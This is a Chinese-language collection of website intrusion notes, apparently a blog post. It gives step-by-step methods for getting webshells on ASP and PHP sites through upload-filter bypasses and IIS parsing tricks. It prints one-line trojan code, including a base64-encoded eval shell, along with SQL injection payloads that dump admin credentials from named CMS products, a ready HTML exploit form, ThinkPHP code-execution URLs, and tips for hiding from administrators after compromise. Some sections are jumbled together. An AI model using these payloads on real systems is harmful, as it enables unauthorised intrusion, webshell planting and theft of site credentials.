渗透笔记大全
【 拿shell 】
1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls
2.上传图片木马遇到拦截系统,连图片木马都上传不了,记事本打开图片木马在代码最前面加上gif89a,一般就能逃过拦截系统了。
3.上传图片木马把地址复制到数据库备份里备份成asp木马,有时不成功就利用IIs6.0解析漏洞尝试突破。
4.上传图片木马再用抓包工具进行抓包,用明小子的综合上传功能,复制上传地址及cookies填到对应的框里,点击上传即可。
5.当后台有数据库备份蛋没有上传点时,把一句话木马插到任意处,再到数据库备份里备份成asp木马,之后用一句话客户端连接木马即可。
6.后台点击修改密码,新密码设置为:1″:eval request(“h”)’设置成功后连接asp/config.asp即可拿下shell
7.当页面提示“上传格式不正确[重新上传]” 则说明存在上传漏洞,复制地址放到明小子里上传,一般都能直接拿下shell。
8.当后台没有数据库备份但有数据库恢复的情况下,请不要犹豫,数据库恢复跟数据库备份功能是一样的,直接邪恶吧。
9.如果知道网站的数据库是asp的,直接在前台找留言板插入一句话木马,连接配置文件inc/config.asp即可拿下shell。
10.当网站前台有“会员注册” 注册一个账户进去看看有没有上传点,有的话直接上传asp木马以及利用iis6.0解析漏洞,不行就抓包用明小子上传。
11.先上传一个.ashx的文件,在笔记里搜索可找到方法,结果是访问会生成一句话木马文件,后台上传、编辑器上传、上传漏洞页面均可使用此方法。
12.当页面提示只能上传jpg|gif|png等格式的时候,右键查看源文件,本地修改为asp|asa|php再本地上传即可拿下shell。
13.当用啊D检测注入点提示SA权限或DB权限的时候,尝试列目录找到网站物理路径,再点击cmd/上传,直接上传asp木马即可,不行就差异备份拿shell。
14.对于一些上传漏洞的上传页面,以及后台找到的上传页面,可以尝试用本地双文件上传突破,第一个选jpg第二个选cer,推荐使用火狐浏览器。
=============================================================================================================================================================
【 渗透技巧 】
1.某些cms的网站设置过滤不严,直接在网站后面加上admin/session.asp 或 admin/left.asp 可以绕过后台验证直接进去后台。
2.提下服务器之后建议抓下管理员哈希值,然后删除所有用户包括自己的,以后登录这台服务器就用管理员的账号密码登录,这样比较安全。
3.入侵网站之前连接下3389,可以连接上的话先尝试弱口令,不行就按5次shift键,看看有没有shift后门。
4.访问后台地址时弹出提示框“请登陆” 把地址记出来(复制不了)放到“网页源代码分析器”里,选择浏览器-拦截跳转勾选–查看即可直接进入后台。
5.突破防盗链系统访问shell代码:javascript:document.write(“<a href=’http://www.xxx.com/uploadfile/1.asp‘>fuck</a>”) 点击GO即可进入shell。
6.遇到一流信息监控拦截系统时,上传图片木马或是在木马代码最前面加上gif89a即可逃过检测。
7.eweb编辑器后台,增加了asp|asa|cer|php|aspx等扩展名上传时都被过滤了,尝试增加一个aaspsp,再上传asp就会解析了。
8.用注入工具猜解到表段却猜解不到字段的时候,到网站后台右键查看源文件,一般账号密码后面的就是字段,之后在注入工具里添加字段进行猜解即可。
9.当注入工具猜解表段,但猜解字段时提示长度超过50之类,不妨扔到穿山甲去猜解一下。
10.得知表段跟字段之后,使用SQL语句在ACCESS数据库里加个用户名及密码的语句:Insert into admin(user,pwd) values(‘jianmei’,'daxia’)
11.当获得管理员密码却不知道管理员帐号时,到网站前台找新闻链接,一般“提交者”“发布者”的名字就是管理员的帐号了。
12.爆破ASP+IIS架设的网站web绝对路径,假设网站主页为:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。
13.有的站长很懒什么也不改,当我们得知网站的cms的时候,不妨去下载一套找找数据库路径,以及敏感信息,再尝试默认相关的可利用资源。
14.菜刀里点击一句话木马右键,选择虚拟机终端,执行命令出现乱码时,返回去设置编码那里,将默认的GB2312改为UTF-8.
15.入侵千万别忘了ftp,试试诺口令,ftp的默认端口:21 默认帐号密码:test
16.破解出md5为20位结果,只需要把前三位和后一位去掉,剩余16位拿去解密即可
17.好多网站的后台地址是:admin_index.asp manage_login.asp
18.有时在木马代码里加上了gif89a,上传成功访问的时候却出现了像图片一样的错误图像,说明服务器把gif89a当做图片来处理了,不要带gif89a即可。问就可以了。
19.找eweb编辑器的时候,如果默认的被改了,到前台去找图片右键看下路径,根据图片的目录猜eweb编辑器的目录,后台也是用此思路。
20.IIS注册表全版本泄漏用户路径和FTP用户名漏洞:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\
21.扫旁站的时候,是不是想看每个站点是什么cms呢?用轩辕剑扫描就可以显示系统特征。
22.网站的主站一般都很安全,这时就要旁注或C段了,但是想知道各个IP段开放了什么端口吗?用“啊D网络工具包”里面的IP端口扫描最理想了。
23.手工检测注入点弹出“你的操作已被记录!”之类的信息,访问这个文件:sqlin.asp,如果存在,在注入点后面植入一句话木马:‘excute(request(“TNT”))
接着用一句话木马客户端连接:http://www.xxx.com/sqlin.asp,上传木马即可拿下shell,因为很多防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库。
24.有的后台不显示验证码,往注册表里添加一个ceg即可突破这个困境了,把下面的代码保存为Code.reg,双击导入就可以了。
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
“BlockXBM”=dword:00000000
25.内网渗透时尽量少登录3389,以免被管理员发现;
26.旁注的时候,建议挑php的站点来日,因为php站点一般都支持aspx脚本,这样对于提权跟跨目录都轻松.!
=============================================================================================================================================================
【 手工注入 】
IE浏览器-工具-Internet选项-高级-显示友好HTTP错误信息前面的勾去掉,否则不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的信息。
手工注入时如果网站过滤了 and 1=1 and 1=2 ,可以用xor 1=1 xor 1=2 进行判断。
第一步:找注入点
(数字型)http://www.xxx.com/show.asp?id=7
加’ 程序报错
加and 1=1 返回正常页面
加and 1=2 返回错误页面
(字符型)http://www.xxx.com/show.asp?id=ade7
加’ 程序报错
加’and ’1′=’1 返回正常页面
加’and ’1′=’2 返回错误页面
新型检测注入点的方法:
在URL地址后面加上-1,若返回的页面和前面不同,是另一个正常的页面,则表示存在注入漏洞,而且是数字型的注入漏洞。
在URL地址后面加上-0,若返回的页面和之前的页面相同,然后加上-1,返回错误页面,则也表示存在注入漏洞,而且是数字型的。
如果报错提示这个:
Microsoft JET Database Engine 错误 ’80040e14′
语法错误 (操作符丢失) 在查询表达式 ‘ID = 6 ord by’ 中。
/fun/Function.asp,行 657
解明:通过 JET 引擎连接数据库,则是 Access数据库,通过 ODBC 引擎连接数据库,则是 MSSQL数据库。
第二步:猜字段数
语句:order by 5
如果猜6的时候返回出错,就继续往回猜,直到返回正确为止…
第三步:UNION命令
语句:and 1=2 union select 1,2,3,4,5–
看看哪里可以替换,假如显示有2,就在2这里替换SCHEMA_NAME,见下
第三步:猜库名
语句:and 1=2 union select 1,SCHEMA_NAME,3,4,5 from information_schema.SCHEMATA limit 1,1
第四步:猜表段
语句:and 1=2 union select 1,TABLE_NAME,3,4,5 from information_schema.TABLES where TABLE_SCHEMA=0x68667A7338383838 limit 1,1
注意,TABLE_SCHEMA=后面的库名必须是hex转换过的格式,倒数第二个1一直替换,直到爆出所有表段,然后选最可能性的那个。
第五步:猜字段
and 1=2 union select 1,COLUMN_NAME,3,4,5 from information_schema.COLUMNS where TABLE_NAME=0x615F61646D696E limit 1,1
注意,TABLE_SCHEMA=后面的表段必须是hex转换过的格式,倒数第二个1一直替换,直到爆出所有字段,然后选最可能性的那两个。
第六步:猜内容
语句一:and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin
首先让程序报错,所以在注入点后面加上 and 1=2
语句二:http://www.xxx.com/show.asp?id=-178 union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin
同样是先让程序报错,在178这个参数前面加上 -
当列名帐号跟列名密码都猜解对的时候,页面将会显示相对应的内容,一般的密码都经过MD5加密了,解密地址:http://www.cmd5.com/; UserName Password
=============================================================================================================================================================
【 常见网站程序 】
asp类:
foosun(风讯)
kesion(科汛)
newasp(新云)
乔客
CreateLive(创力)
5uCMS
KingCMS
DvBBS(动网)
BBSxp
[博客]zblog
PHP类: DeDeCms(织梦) ECMS(帝国) PHPCMS SupeSite Joomla! [BBS]Discuz! [SNS]UCenterHome [商城]EcShop [博客]WordPress [维基]HDWiki [DIGG]PBdigg 普通代码:user.php?act=order_query&order_sn=’ union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/* 变种代码:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319 拿shell方法很简单,找到“库项目管理”再选择“配送的方式”,在代码最下面插入php一句话木马:<?php eval($_POST[x]);?> 不行就换php木马的预代码! 主要是差不多3个版本为主吧, V2.0 data/dkcm_ssdfhwejkfs.mdb V3.1 _data/___dkcms_30_free.mdb V4.2 _data/I^(()UU()H.mdb 默认后台:admin 编辑器:admin/fckeditor 由此可见,官方安全意识挺差的,至于后台拿shell,fck编辑器突破可拿shell 建立asp文件夹 Fck的路径:Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp 那么直接用下面的exp爆出所有管理员的帐号密码: $fp = @fopen(“0day.php”, ‘a’); @fwrite($fp, ‘<’.'?php’.”\r\n\r\n”.’eval($_POST[0day])’.”\r\n\r\n?”.”>\r\n”);
[博客]pjblog
PHP168
HBcms(宏博)
CMSware(思维)
[BBS]phpWind
[SNS]ThinkSNS
[商城]ShopEx
[微博]PHPsay
( php开源mysql绝对路径 )
开源系统 数据库配置文件名 文件名所在的目录
Discuz! config.inc.php ./ config.inc.php
Phpcms config.inc.php ./include/config.inc.php
Wodpress wp-config.php ./ wp-config.php
Phpwind sqlconfig.php ./data/sqlconfig.php
phpweb config.inc.php ./config.inc.php
Php168v6 mysql_config.php ./php168/ mysql_config.php
Shopex config.php ./config/config.php
Ecshop config.php ./data/config.php
Joomla configuration.php ./ configuration.php
UCenter config.inc.php ./data/config.inc.php
EmpireCMS config.php ./e/class/config.php
Dedecms common.inc.php .data/common.inc.php
Zen Cart configure.php ./includes/configure.php
Mediawiki localsettints.php ./config/localsettints.php
Ecshop config.php ./data/config.php
osCommerce configure.php ./includes/configure.php
=============================================================================================================================================================
【 动易2006后台拿shell 】
进入后台后,我们在左边菜单栏中选择“系统设置”,然后在出现的菜单栏里选择“自定义页面管理”,
接着需要先添加一个自定义页面分类,选择“添加自定义分类”这个选项,分类名称与分类简介都可以随便填写。填写完毕后选择“添加”,系统提示添加成功。
下面再来选择“添加自定义页面”,“页面名称”随便输入,“所属分类”就是刚才建立的分类就可以了。“页面类型”和“页面路径”都不用管,保持默认.
不过如果没有改页面路径的话,默认生成的文件是在根目录下的,也就是http://www.xx.com/maer.asp.“文件名称”即输入生成的木马的文件名。
“页面简介”也不用管,下面就是页面内容了。这里填入小马的代码。一切完毕点击“添加”会提示保存自定义页面成功。最后一步是要生成我们的木马页面。
选择“自定义页面管理首页”,点击右边出现的“生成本页”就OK 了,成功获得动易的shell。
=============================================================================================================================================================
【 Shopex4.8.5 注入漏洞后台拿shell 】
关键词:powered by shopex v4.8.5
exp:
<html>
<head>
<title>Shopex 4.8.5 SQL Injection Exp</title>
</head>
<body>
<h2>Shopex 4.8.5 SQL Injection Exp (product-gnotify)</h2>
<form action=”http://www.lpboke.com/?product-gnotify” method=”post” name=”submit_url”>
<input type=”hidden” name=”goods[goods_id]” value=”3″>
<input type=”hidden” name=”goods[product_id]” value=”1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators”>
<input type=”submit” value=”">
</form>
fuck
<body>
</html>
保存为html格式,替换代码中的网站,本地打开后点击小图标,出现新页面,帐号密码爆出来了,默认后台:shopadmin
拿shell方法….
第一步 页面管理 修改模版 然后选一个XML编辑
开始用 live http 抓包 你们懂的 然后把第一个POST包给抓出来
然后改包 id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=
解释一下 id是你选择的模版文件夹名称 后面的info.xml 是你修改的XML文件 tmpid= 你们懂的 就是模版文件夹 然后 name 是你提交的文件名字 file_source 是后门或者shel
我这里是一句话 你们懂的 然后提交了之后 地址是这样的http://Madman.in/themes/文件名称/你的木马名称
=============================================================================================================================================================
【 ecshop漏洞总汇 】
关键字:powered by ecshop
直接在网站后台加入代码回车就能爆出帐号密码,再去掉代码加上/admin回车就能直接进后台了。
接着保存,一句话路径是:http://www.xxx.org/myship.php; 打开“ASP+PHP两用Shell.html”填入地址,点击一下环境变量,成功之后点击上传文件就可以拿shell了。
=============================================================================================================================================================
【 ESPCMS通杀0day 】
关键字:inurl:index.php?ac=article&at=read&did=
默认后台:adminsoft/index.php 或者 admin/
注入点(爆表前缀,比如:cm_admin……前缀就是cm,后面3个代码要自行替换):
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,table_name,0×27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆用户名:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆密码:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,password,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
密码和用户一次性爆:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
拿shell:
进到后台后,直接点击分类图片===修改==选择文件===直接上传一句话木马
PS:
当上传不了php网马时,去系统设置一下,添加图片上传格式 |php 这样就可以上传一个图片文件头的网马。
=============================================================================================================================================================
【 帝国cms 6.6最新版本 】
自定义页面-增加自定义页面-随便写个.php文件名,内容写:<script language=”php”>echo base64_decode(“PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=”);</script>
如果内容直接添一句话或者php大马是无用的,因为他会生成xxx.php前先给你执行,
PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= 就是 <?php @eval($_POST['cmd']);?> 的base64加密。
所以生成xxx.php后 会出现内容 <?php @eval($_POST['cmd']);?> 在文件里,然后用菜刀直接连接吧。
=============================================================================================================================================================
【 phpweb 】
关键字:inurl:down/class/index.php?myord=
后台地址:admin.php
万能密码:admin ‘or ’1′=’1
注入地址:down/class/index.php?myord=1
表段:pwn_base_admin
拿shell通杀漏洞:登入后台–文章–文章发布–文章内容里的图片上传按钮–抓包之后改包NC提交。
也可以用下面的exp拿shell:
用火狐浏览器登录后台,因为火狐浏览器有保留cookies的功能, 找到“phpweb之exp”这个html,拉进火狐浏览器器里上传1.php;.jpg的一句话木马,查看源码菜刀连接!
=============================================================================================================================================================
【 动科(dkcms)漏洞分析 】
官方网站:www.dkcms.com
=============================================================================================================================================================
【 ESPCMS通杀0day 】
百度关键字:inurl:index.php?ac=article&at=read&did=
默认后台:adminsoft/index.php
注入点(爆表前缀):index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,table_name,0×27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆帐号:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆密码:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,password,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
帐号和密码一次性爆:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
进到后台后,直接点击分类图片-修改-选择文件-直接上传php一句话木马
PS:当上传不了php木马时,去系统设置一下,添加图片上传格式 |php ,这样就可以上传一个图片文件头的php木马。
=============================================================================================================================================================
【 Thinkphp框架任意代码执行漏洞 】
ThinkPHP是一款国内使用比较广泛的老牌PHP MVC框架,官方已经发布修复漏洞的补丁,地址:http://thinkphp.cn/down-116.html
关键字:thinkphp intitle:系统发生错误
获取Thinkphp的版本号:index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D
获取服务器的配置信息:index.php/module/aciton/param1/${@phpinfo()}
列出网站所有文件列表:index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al
直接在网页执行一句话:index.php/module/action/param1/{${eval($_POST)}}
菜刀连接:http://www.xxx.com/index.php/module/action/param1/{${eval($_POST)}} 密码:s
=============================================================================================================================================================
【 良精系统 】
( 爆管理员帐号密码的代码 )
NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’
( 一句话木马的妙用 )
插入一句话木马后,连接网站的配置文件:inc/config.asp 密码都是g
1.网站配置-允许的上传文件类型-插入闭合的一句话木马:”%><%eval request(“g”)%><%s=” 不行就增加一个cer格式,之后上传cer格式的木马即可
2.网站配置-网站地址-插入闭合的一句话木马:http://”%><%execute(request(“g”))%><%’
3.网站配置-网站名称-插入闭合的一句话木马:沧州临港彩越化工有限公司”%><%eval request(“g”)%><%s=”
4.网站配置-版权信息-插入闭合的一句话木马:”%><%eval(request(chr(103)))%><%’
5.本方法适用于access数据库,只要在access数据库任何地方插入:┼攠數畣整爠煥敵瑳∨≡┩> 再将mdb备份成asp或者asa,访问这个asp或asa,就是一句话木马。
( 利用upfile_other.asp漏洞拿shell )
直接访问会员中心:userreg.asp
注册一个用户并在未退出登录的状态下,使用双文件上传工具足以爆它菊花,以下代码保存为1.html,并里面的修改目标站,第一个上传jpg,第二个上传cer
<HTML><HEAD> <META http-equiv=Content-Type content=”text/html; charset=gb2312″> <STYLE type=text/css>BODY { FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee } .tx1 { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px } </STYLE>
<META content=”MSHTML 6.00.2800.1400″ name=GENERATOR></HEAD> <BODY leftMargin=0 topMargin=0> <FORM name=form1 action=”http://www.xxx.com/upfile_other.asp“; method=post encType=multipart/form-data><INPUT type=file size=30 name=FileName> <INPUT type=file size=30 name=FileName1> <INPUT style=”BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal” type=submit value=上传 name=Submit> <INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
另外可以利用会员中心的cookies,用火狐浏览器登陆之后,访问upfile_other.asp页面,用抓包工具去抓包,接着用明小子上传拿shell.
( 上传漏洞 )
漏洞文件:Upfile_Photo.asp
前提是进入后台了,访问这个文件,将提示“请先选择你要上传的文件!”,用抓包工具抓管理员的cookies,再把上传地址跟cookies扔到名小子里上传拿shell
( 南方在线编辑器 )
默认后台:admin/Southidceditor/admin_style.asp
数据库路径:admin/SouthidcEditor\Datas\SouthidcEditor.mdb
遍历目录:admin/Southidceditor/admin_uploadfile.asp?id=14&dir=../..
文件上传页面:admin/Southidceditor/ewebeditor.asp?id=57&style=southidc
样式设置页面:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47
=============================================================================================================================================================
【 dedecms最新注入漏洞及找后台技巧 】
访问这个:plus/search.php?keyword=as&typeArr[ uNion ]=a
看结果如果提示:Safe Alert: Request Error step 1 !
plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
看结果如果提示:Safe Alert: Request Error step 2 !
那么直接用下面的exp爆出所有管理员的帐号密码: a198654
plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
有些/plus/目录换成了/plugins/目录,这时就要把/plus/换成/plugins/进行注射了
破解出md5为20位结果,只需要把前三位和后一位去掉,剩余16位拿去解密即可
如何找后台?
默认后台:dede
第一种方法:data/mysql_error_trace.inc (有时可以爆出路径)
第二种方法:把域名作为后台去尝试
第三种方法:查看这个文件:robots.txt
第四种方法:ping下域名获得ip之后,http://www.bing.com/ 搜索:ip:127.0.0.1 php (可能获得后台也可以获得其他旁注站,一般dede的旁站很多也是dedecms的)
=============================================================================================================================================================
【 PHPcms V9 爆数据库信息漏洞】
直接爆出数据库连接信息:/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php
关于后台拿webshell:进入后台后点击界面–模版风格–随便找个页面点击修改,插入我们的一句话代码
<?
点击保存,接着点击可视化,代码就成功执行了,接着菜刀连接/0day.php,密码0day
还不快抢沙发